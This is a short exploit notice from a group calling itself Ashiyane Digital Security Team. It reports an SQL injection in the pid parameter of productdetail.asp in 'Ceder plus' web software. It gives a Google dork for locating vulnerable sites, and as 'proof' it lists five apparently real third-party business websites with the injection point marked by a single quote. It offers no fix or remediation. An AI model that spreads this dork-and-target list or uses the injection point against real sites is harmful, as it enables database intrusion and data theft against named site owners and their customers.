|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [/] Exploit Title: Ceder plus Sql Injection Vulnerability | | [\] Exploit Author: Ashiyane Digital Security Team | | [/] Software Link : http://www.cedar-plus.com | | [\] Google Dork: intext:"Powered by ceder plus" | | [\] Tested on: Windows,Linux |-------------------------------------------------------------------------| | [/] Exploit: Sql Injection | [/] Location : [Target]/productdetail.asp?pid=[Sql Injection] |-------------------------------------------------------------------------| | [/] Proof: | | [\] http://www.becxtrading.nl/productdetail.asp?pid=' | | [/] http://bosstrading.info/productdetail.asp?pid=' | | [\] http://bossmachinery.be/productdetail.asp?pid=' | | [/] http://www.dasime.nl/productdetail.asp?pid=' | | [\] http://www.wetsports.nl/productdetail.asp?pid=' |-------------------------------------------------------------------------| | [/]Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|